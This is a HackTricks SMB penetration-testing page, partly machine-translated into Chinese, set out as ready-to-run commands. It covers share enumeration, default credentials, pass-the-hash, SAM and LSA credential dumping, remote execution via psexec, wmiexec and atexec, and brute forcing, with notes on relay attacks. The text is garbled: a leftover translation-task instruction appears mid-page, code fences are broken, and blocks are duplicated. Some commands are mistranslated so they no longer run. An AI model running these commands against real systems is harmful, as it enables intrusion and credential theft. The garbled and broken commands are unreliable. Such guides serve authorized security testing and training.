hacktricks/network-services-pentesting/pentesting-smb.md

# 139,445 - SMB 渗透测试

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 你在一家**网络安全公司**工作吗？想要在 HackTricks 中**宣传你的公司**吗？或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks 仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud)提交 PR 来分享你的黑客技巧**。

</details>

## **端口 139**

**NetBIOS** 代表 _网络基本输入输出系统_。它是一种软件协议，允许局域网（LAN）上的应用程序、个人电脑和桌面电脑与网络硬件进行通信，并在网络上传输数据。在 NetBIOS 网络上运行的软件应用程序通过它们的 NetBIOS 名称定位和识别彼此。NetBIOS 名称最长可达 16 个字符，并且通常与计算机名称分开。当一个应用程序（客户端）通过 **TCP 端口 139** 发送命令“呼叫”另一个客户端（服务器）时，它们会启动一个 NetBIOS 会话。（摘自[这里](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)）
```
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
```
## 端口445

虽然端口139在技术上被称为“NBT over IP”，但端口445是“SMB over IP”。**SMB**代表“**Server Message Blocks**”。现代语言中，Server Message Block也被称为**Common Internet File System**。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享文件、打印机、串口和其他通信方式。

例如，在Windows上，SMB可以直接在TCP/IP上运行，而无需NetBIOS over TCP/IP。正如你所指出的，这将使用端口445。在其他系统上，你会发现服务和应用程序使用端口139。这意味着SMB正在使用NetBIOS over TCP/IP。（摘自[这里](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)）
```
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB

Server Message Block (`SMB`) 是一种**客户端-服务器**协议，用于管理对文件、整个目录和其他网络资源（如打印机、路由器或网络接口）的访问。该协议的主要应用领域是特定的**Windows**操作系统系列，其网络服务以向下兼容的方式支持SMB - 这意味着具有较新版本的设备可以轻松与安装有较旧Microsoft操作系统的设备进行通信。\
通过免费软件项目**Samba**，还可以在Linux和Unix发行版中使用**SMB**，从而实现跨平台的SMB通信。

SMB服务器可以将其本地文件系统的**任意部分作为共享**提供。因此，对客户端可见的**层次结构**部分上**独立于服务器上的结构**。**访问权限**由`访问控制列表`（`ACL`）定义。它们可以根据**`执行`**、**`读取`**和**`完全访问`**等属性以**细粒度的方式**对个别用户或用户组进行控制。**ACL**是基于共享定义的，因此与在服务器上本地分配的权限不对应。

### IPC$ 共享

来自书籍 _**Network Security Assessment 3rd edition**_

通过匿名空会话，您可以访问IPC$共享并与通过命名管道公开的服务进行交互。Kali Linux中的enum4linux实用程序非常有用；使用它，您可以获取以下信息：

* 操作系统信息
* 父域的详细信息
* 本地用户和组列表
* 可用SMB共享的详细信息
* 有效的系统安全策略

## 什么是NTLM

如果您不知道什么是NTLM，或者想了解它是如何工作和如何滥用它的，您会发现这个关于**NTLM**的页面非常有趣，其中解释了**该协议的工作原理以及您如何利用它：**

{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
{% endcontent-ref %}

## **服务器枚举**

### **扫描**网络以搜索主机：
```bash
nbtscan -r 192.168.0.1/24
```
### SMB 服务器版本

为了寻找可能的 SMB 版本漏洞，了解正在使用的版本非常重要。如果这些信息在其他工具中没有显示，你可以：

* 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version**
* 或者使用以下脚本：
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **搜索漏洞**

To search for exploits, you can use various tools and resources. Here are some common methods:

- **Exploit Databases**: Websites like Exploit-DB, Rapid7, and Metasploit provide extensive databases of known exploits. You can search these databases using relevant keywords or specific vulnerabilities.

- **Vulnerability Scanners**: Tools like Nessus, OpenVAS, and Nexpose can scan networks and systems for known vulnerabilities and provide a list of potential exploits.

- **Security Bulletins**: Software vendors and security organizations often release security bulletins that detail vulnerabilities and their associated exploits. These bulletins can be found on the vendor's website or through security advisory services.

- **Exploit Frameworks**: Frameworks like Metasploit offer a wide range of exploits and payloads that can be used for penetration testing. These frameworks provide a command-line interface for searching and executing exploits.

Remember to always use these tools and resources responsibly and with proper authorization. Unauthorized exploitation of vulnerabilities is illegal and unethical.
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **可能的**凭据

| **用户名**           | **常见密码**                              |
| -------------------- | ----------------------------------------- |
| _(空白)_             | _(空白)_                                 |
| guest                | _(空白)_                                 |
| Administrator, admin | _(空白)_, password, administrator, admin |
| arcserve             | arcserve, backup                          |
| tivoli, tmersrvd     | tivoli, tmersrvd, admin                   |
| backupexec, backup   | backupexec, backup, arcada                |
| test, lab, demo      | password, test, lab, demo                 |

### SMB环境信息

### 获取信息
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### 枚举用户、组和已登录用户


# 这些信息应该已经从enum4linux和enum4linux-ng中收集到了
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### 枚举本地用户
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
以下是关于黑客技术的一本书中的内容。以下内容来自文件network-services-pentesting/pentesting-smb.md。将相关的英文文本翻译成中文，并返回翻译结果，保持完全相同的markdown和html语法。请不要翻译代码、黑客技术名称、黑客术语、云/SaaS平台名称（如Workspace、aws、gcp...）、泄漏一词、渗透测试和markdown标签。此外，请不要添加任何额外的内容，只需提供翻译和markdown语法即可。
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - 枚举本地用户
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts 主机名.local
run
```

### **Enumerating LSARPC and SAMR rpcclient**

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
{% endcontent-ref %}

### GUI connection from linux

#### In the terminal:

`xdg-open smb://cascade.htb/`

#### In file browser window (nautilus, thunar, etc)

`smb://friendzone.htb/general/`

## Shared Folders Enumeration

### List shared folders

It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**.

```bash
```markdown
## smbclient --no-pass -L //<IP> # 空用户
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> # 如果省略密码，将提示输入。使用 --pw-nt-hash，提供的密码是NT哈希值

## smbmap -H <IP> [-P <PORT>] # 空用户
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] # 凭证
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] # Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] # 递归列表

## crackmapexec smb <IP> -u '' -p '' --shares # 空用户
crackmapexec smb <IP> -u 'username' -p 'password' --shares # Guest用户
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # Guest用户
```
```

### **Connect/List a shared folder**

```bash
# 使用smbclient进行连接
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #如果省略密码，将会提示输入。使用--pw-nt-hash，提供的密码是NT哈希值
# 使用--no-pass -c 'recurse;ls' 以smbclient递归列出文件列表

# 使用smbmap进行列出，不指定文件夹将列出所有内容
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # 递归列出
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # 非递归列出
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] # 使用哈希传递密码
```

### **Manually enumerate windows shares and connect to them**

It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all.

Common share names for windows targets are

* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON

(Common share names from _**Network Security Assessment 3rd edition**_)

You can try to connect to them by using the following command

```bash
```markdown
使用空会话连接到Windows共享：
```
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE>
```

```markdown
使用身份验证会话连接到Windows共享（将提示输入密码）：
```
```bash
smbclient -U '<USER>' \\\\<IP>\\<SHARE>
```
```

or this script (using a null session)

```bash
#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] 可以创建一个空会话来访问 $share" # 如果命令成功执行，没有输出，因此假设已创建会话
else
echo $output # 输出错误信息（例如 NT_STATUS_ACCESS_DENIED 或 NT_STATUS_BAD_NETWORK_NAME）
fi
done
```

examples

```bash
```markdown
## SMB服务渗透

### smbclient命令

使用`smbclient`命令可以与SMB服务进行交互。以下是一些常用的`smbclient`命令示例：

- `smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here`：返回`NT_STATUS_BAD_NETWORK_NAME`错误。
- `smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$`：返回`NT_STATUS_ACCESS_DENIED`错误，或者甚至会给你一个会话。
```

```html
<h2>SMB服务渗透</h2>

<h3>smbclient命令</h3>

<p>使用<code>smbclient</code>命令可以与SMB服务进行交互。以下是一些常用的<code>smbclient</code>命令示例：</p>

<ul>
<li><code>smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here</code>：返回<code>NT_STATUS_BAD_NETWORK_NAME</code>错误。</li>
<li><code>smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$</code>：返回<code>NT_STATUS_ACCESS_DENIED</code>错误，或者甚至会给你一个会话。</li>
</ul>
```
```

### Mount a shared folder

```bash
```shell
挂载 -t cifs //x.x.x.x/share /mnt/share
挂载 -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
```

### **Download files**

Read previous sections to learn how to connect with credentials/Pass-the-Hash.

```bash
#搜索并下载文件
sudo smbmap -R 文件夹 -H <IP> -A <文件名> -q # 以递归模式搜索文件并将其下载到 /usr/share/smbmap 中
```

```bash
# 下载全部文件
smbclient //<IP>/<共享目录>
> mask ""
> recurse
> prompt
> mget *
# 将所有文件下载到当前目录
```

Commands:

* mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
* recurse: toggles recursion on (default: off)
* prompt: toggles prompting for filenames off (default: on)
* mget: copies all files matching the mask from host to client machine

(_Information from the manpage of smbclient_)

### Domain Shared Folders Search

* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****

```bash
```
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

使用Snaffler.exe工具，执行以下命令：

```
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

- `-s` 参数表示启用扫描模式。
- `-d domain.local` 参数指定要扫描的目标域名。
- `-o snaffler.log` 参数将扫描结果输出到名为snaffler.log的日志文件中。
- `-v data` 参数表示详细输出扫描结果的数据信息。
```

* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`

```bash
```
sudo crackmapexec smb 10.10.10.10 -u 用户名 -p 密码 -M spider_plus --share '部门共享'
```
```

Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.

{% hint style="info" %}
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
{% endhint %}

## Read Registry

You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:

```bash
```
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```

```
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
```

## Post Exploitation

The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:

| **Setting**                 | **Description**                                                     |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes`          | Allow listing available shares in the current share?                |
| `read only = no`            | Forbid the creation and modification of files?                      |
| `writable = yes`            | Allow users to create and modify files?                             |
| `guest ok = yes`            | Allow connecting to the service without using a password?           |
| `enable privileges = yes`   | Honor privileges assigned to specific SID?                          |
| `create mask = 0777`        | What permissions must be assigned to the newly created files?       |
| `directory mask = 0777`     | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh`  | What script needs to be executed on the user's login?               |
| `magic script = script.sh`  | Which script should be executed when the script gets closed?        |
| `magic output = script.out` | Where the output of the magic script needs to be stored?            |

The command `smbstatus` gives information about the **server** and about **who is connected**.

## Authenticate using Kerberos

You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:

```bash
```markdown
## SMB (Server Message Block) 渗透测试

### smbclient --kerberos //ws01win10.domain.com/C$

使用 `smbclient` 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机上的共享文件夹 `C$`。

### rpcclient -k ws01win10.domain.com

使用 `rpcclient` 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机。
```

```html
<h2>SMB (Server Message Block) 渗透测试</h2>

<h3>smbclient --kerberos //ws01win10.domain.com/C$</h3>

<p>使用 <code>smbclient</code> 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 <code>ws01win10.domain.com</code> 主机上的共享文件夹 <code>C$</code>。</p>

<h3>rpcclient -k ws01win10.domain.com</h3>

<p>使用 <code>rpcclient</code> 命令与 SMB 服务器建立连接，并使用 Kerberos 身份验证。连接的目标是 <code>ws01win10.domain.com</code> 主机。</p>
```
```

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
```markdown
安装crackmapexec：
```
```shell
apt-get install crackmapexec
```

```markdown
执行Powershell命令：
```
```shell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
```

```markdown
执行cmd命令：
```
```shell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
```

```markdown
使用Pass-the-Hash技术：
```
```shell
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami
```

```markdown
使用不同的执行方法：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --exec-method {mmcexec,smbexec,atexec,wmiexec}
```

```markdown
获取SAM信息：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam
```

```markdown
获取LSASS内存哈希：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa
```

```markdown
获取会话信息：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions
```

```markdown
获取已登录用户：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users
```

```markdown
枚举磁盘：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks
```

```markdown
枚举用户：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users
```

```markdown
枚举组：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups
```

```markdown
枚举本地组：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups
```

```markdown
获取密码策略：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol
```

```markdown
使用RID暴力破解：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute
```

```markdown
使用Pass-The-Hash技术：
```
```shell
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH>
```
```

### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
#如果没有提供密码，将会提示输入
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # 使用Pass-the-Hash
```

Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**

### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
#如果没有提供密码，将会提示输入密码
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #提示输入密码
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #传递哈希
#您可以在命令的末尾添加要执行的CMD命令，如果不这样做，将提示一个半交互式shell
```

Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**

```bash
#如果没有提供密码，将会提示输入密码
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#您可以在命令的末尾添加要执行的CMD命令，如果不这样做，将提示一个半交互式shell
```

### [AtExec](../windows-hardening/ntlm/atexec.md)

Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
```
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```

```
./atexec.py [[域/]用户名[:密码]@]<目标名称或地址> "命令"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```
```

## Impacket reference

[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)

## **Bruteforce users credentials**

**This is not recommended, you could block an account if you exceed the maximum allowed tries**

```bash
```shell
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #使用ridenum.py脚本对rid进行暴力破解，然后尝试对每个用户名进行暴力破解
```
```

## SMB relay attack

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

## SMB-Trap

The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:

* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)

### SMBTrap using MitMf

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).

[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)

## HackTricks Automatic Commands

```
协议名称：SMB
端口号：137、138、139
协议描述：服务器消息块

条目1：
名称：笔记
描述：SMB的笔记
注意：|
虽然端口139在技术上被称为“NBT over IP”，端口445是“SMB over IP”。SMB代表“服务器消息块”。现代语言中，服务器消息块也被称为常见的Internet文件系统。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享访问文件、打印机、串口和其他通信方式。

#每当我看到一个开放的SMB端口时，我按照以下顺序运行这些命令

无凭证
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

有凭证
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb

条目2：
名称：Enum4Linux
描述：常规SMB扫描
命令：enum4linux -a {IP}

条目3：
名称：Nmap SMB扫描1
描述：使用Nmap进行SMB漏洞扫描
命令：nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

条目4：
名称：Nmap SMB扫描2
描述：使用Nmap进行SMB漏洞扫描（不太具体）
命令：nmap --script smb-vuln* -Pn -p 139,445 {IP}

条目5：
名称：Hydra暴力破解
描述：需要用户名
命令：hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

条目6：
名称：SMB/SMB2 139/445无需运行msfconsole的mfs枚举
描述：SMB/SMB2 139/445枚举，无需运行msfconsole
注意：来源于https://github.com/carlospolop/legion
命令：msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>